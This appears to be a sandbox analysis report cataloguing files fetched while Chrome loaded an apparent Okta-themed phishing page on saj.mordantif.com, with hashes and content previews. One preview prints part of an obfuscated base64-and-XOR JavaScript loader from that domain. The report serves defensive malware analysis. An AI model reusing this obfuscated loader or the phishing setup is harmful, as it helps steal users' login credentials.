                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):70712
                                                        Entropy (8bit):6.94130504124589
                                                        Encrypted:false
                                                        SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                        MD5:F70FF06D19498D80B130EC78176FD3FF
                                                        SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                        SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                        SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (10450)
                                                        Category:downloaded
                                                        Size (bytes):10498
                                                        Entropy (8bit):5.327380141461276
                                                        Encrypted:false
                                                        SSDEEP:192:x9iW+rIadfLTcaTO5BrwjnwSrQ1kPmqQmMjmtmumobU8:x9KVLbw6jqON
                                                        MD5:E0D37A504604EF874BAD26435D62011F
                                                        SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                        SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                        SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                        Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):727
                                                        Entropy (8bit):7.573165690842521
                                                        Encrypted:false
                                                        SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                        MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                        SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                        SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                        SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):231
                                                        Entropy (8bit):6.725074433303473
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                        MD5:547988BAC5584B4608466D761E16F370
                                                        SHA1:C11BB71049702528402A31027F200184910A7E23
                                                        SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                        SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):1400
                                                        Entropy (8bit):7.808470583085035
                                                        Encrypted:false
                                                        SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                        MD5:333EE830E5AB72C41DD9126A27B4D878
                                                        SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                        SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                        SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (47261)
                                                        Category:dropped
                                                        Size (bytes):47262
                                                        Entropy (8bit):5.3977431994288265
                                                        Encrypted:false
                                                        SSDEEP:768:+CWIsQ06lHHhw+E9sygguSwod+dq3VE3qVdze9Ddrl9eom1CQWpKexThupcubvCR:uQflHBW9sygg1NVixrlEM
                                                        MD5:D7BB07B6ECD6FB1A2E123203006C33BA
                                                        SHA1:09CC76938FA366E40992880FF94ACCD8BE0C6640
                                                        SHA-256:8EAE5159C56BF66C17E0CB002B25FC2E343F3E009DC2A39A7E230F08B7B8C672
                                                        SHA-512:D87C6B675EF3F260CC86BD130F91A08F5D07D301F2A7B14778C5CCF42BF0D605957FF653CA53C57203A85AADFF5F66F3514342A35DFAA581FBAF57FC3B72D722
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):120440
                                                        Entropy (8bit):5.8087326491884
                                                        Encrypted:false
                                                        SSDEEP:3072:/S2pZN1fXghtWBnFl7relr9qmUK8FpNm8teC5s2vWhB19+Bae7jXvemhWiC8s2vO:/NFg4Flret9qmU9FpTvvW1beHUWs2+5B
                                                        MD5:9758318A8FF5A555E0B5C1B9B4A4281C
                                                        SHA1:ABA20BCE859D31D8EAF1FD0E798C59CA51CF4D82
                                                        SHA-256:F18FFB599B2D78C400FEAC9DEC424333C20BE610F6F685B034658E82B94AE022
                                                        SHA-512:1E5E390DA7F56DC34E666EF4BB438D4994166C2B264ABE89F9D0ECF96604CD0557E149FD1F7AD36382EB47E7331AD6CA3EF6AFD1FDE23A4E0A10B6BA58F77C1D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/RTOGZZBDODKFRWTTVU5W0HM2Y143SY2BLP11CI?fygndawgjewqbrrl267129585769599075856O5CEBFHBXCG6YJORF6T
                                                        Preview:<script>..function CvklYfoCbZ(CmUoMLuwaF, oPGOVFISSQ) {..let amOTXhAkrr = '';..CmUoMLuwaF = atob(CmUoMLuwaF);..let plhCZMxgKy = oPGOVFISSQ.length;..for (let i = 0; i < CmUoMLuwaF.length; i++) {.. amOTXhAkrr += String.fromCharCode(CmUoMLuwaF.charCodeAt(i) ^ oPGOVFISSQ.charCodeAt(i % plhCZMxgKy));..}..return amOTXhAkrr;..}..var HQrMDcIvEW = CvklYfoCbZ(`dlQWHwgfYTUpTCIBPzx1RjJZBBgnGXI8KiVfWE4JJFdsXUF3UAANCHR4WGxqZhVFUAgjA2wDPihbAB8fagAhJSonVBxMDyUYNyNrP1dFGAQlBjdwPCNXRQ0eL1UmPyRrWhAfFWoBPXApLhgJAwMhHDw3ay1XF0wFPltufy8iTltMQWdLWHBraxhZHw84HCIkazhKBlFOIgEmIDhxF0oPAy4QfDo6Pl0XFUIpGj9/ITpNAB4VZ0Z8ZmV7FggFAmQfIXJ1dxcWDx4jBSZuRkEYRUxMdgYxIiI7TEUfHilIcDg/P0gWVkNlFjY+ZThXBgcJPls7P2R/FlNCXGUGPTMgLkxLBQNkGDs+ZSFLR1JQZQYxIiI7TFthZmpVcnB3OFsXBRw+VSEiKHYaDRgYOgZof2QsUREEGShbMT8mZF4AAhhlBzM+Ly5AFUIGOVogNScuWRYJH2URPSclJ1cECEM8RXxkZXgXFw0CLhAqIGUmUQtCBjlXbGxkOFsXBRw+S19aa2sYRVAfKQc7ID9rSxcPUWgdJiQ7OAJKQw8uGzgjZShUChkILBkzIi5lWwoBQysfMyhkJ1EHH0MpBysgPyQVDx9DfltjfnpkWxcVHD4afzo4ZVUMAkIgBnBud2RLBh4FOgFs
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65447)
                                                        Category:downloaded
                                                        Size (bytes):89501
                                                        Entropy (8bit):5.289893677458563
                                                        Encrypted:false
                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):231
                                                        Entropy (8bit):6.725074433303473
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                        MD5:547988BAC5584B4608466D761E16F370
                                                        SHA1:C11BB71049702528402A31027F200184910A7E23
                                                        SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                        SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/uvtOweyyjyKYQ0krMEjD3S65UkP8fHqrZofTHOSWLmnqO12130
                                                        Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):43596
                                                        Entropy (8bit):7.9952701440723475
                                                        Encrypted:true
                                                        SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                        MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                        SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                        SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                        SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/90cIpGfk2aMerArq2KIwyO12gL058Oayz79
                                                        Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 45 x 64, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):3.982173679986101
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlyt+MMl/xl/k4E08up:6v/lhPJMk/7Tp
                                                        MD5:8D90D8C33D6FCBB7CFAA7F68383802D7
                                                        SHA1:5E16DA8EC40FD6520D12B958E3250DAFA486C4E9
                                                        SHA-256:216E9C1D7C9E14229941F2BE06ABAF5AEAF1E84BAC9CFE2146BFA157CD659849
                                                        SHA-512:38A08A1BED207B2644533C5DD42B0D93FC3F4A53A37A9D09A90DFE1071F850A3818F6FF2FFF1E6FBE0CA414552300C2D6827445D35651E1D7F0C6F995F307D16
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...-...@.......iI....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):270
                                                        Entropy (8bit):4.840496990713235
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                        Category:downloaded
                                                        Size (bytes):28584
                                                        Entropy (8bit):7.992563951996154
                                                        Encrypted:true
                                                        SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                        MD5:17081510F3A6F2F619EC8C6F244523C7
                                                        SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                        SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                        SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/56RePLZ7UZmHT23036MEuv60
                                                        Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (47261)
                                                        Category:downloaded
                                                        Size (bytes):47262
                                                        Entropy (8bit):5.3977431994288265
                                                        Encrypted:false
                                                        SSDEEP:768:+CWIsQ06lHHhw+E9sygguSwod+dq3VE3qVdze9Ddrl9eom1CQWpKexThupcubvCR:uQflHBW9sygg1NVixrlEM
                                                        MD5:D7BB07B6ECD6FB1A2E123203006C33BA
                                                        SHA1:09CC76938FA366E40992880FF94ACCD8BE0C6640
                                                        SHA-256:8EAE5159C56BF66C17E0CB002B25FC2E343F3E009DC2A39A7E230F08B7B8C672
                                                        SHA-512:D87C6B675EF3F260CC86BD130F91A08F5D07D301F2A7B14778C5CCF42BF0D605957FF653CA53C57203A85AADFF5F66F3514342A35DFAA581FBAF57FC3B72D722
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/388c99dd0998/api.js
                                                        Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (45667)
                                                        Category:dropped
                                                        Size (bytes):45806
                                                        Entropy (8bit):5.207605835316031
                                                        Encrypted:false
                                                        SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                        MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                        SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                        SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                        SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):70712
                                                        Entropy (8bit):6.94130504124589
                                                        Encrypted:false
                                                        SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                        MD5:F70FF06D19498D80B130EC78176FD3FF
                                                        SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                        SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                        SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://saj.mordantif.com/uvyQsm5aOXe7LwhKEXm9uwU1nZL7wjYKV3qG6h1ZxHNOmnU5GJvEYJqeEzutqwNDigmRoef257
                                                        Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):2905
                                                        Entropy (8bit):3.962263100945339
                                                        Encrypted:false
                                                        SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                        MD5:FE87496CC7A44412F7893A72099C120A
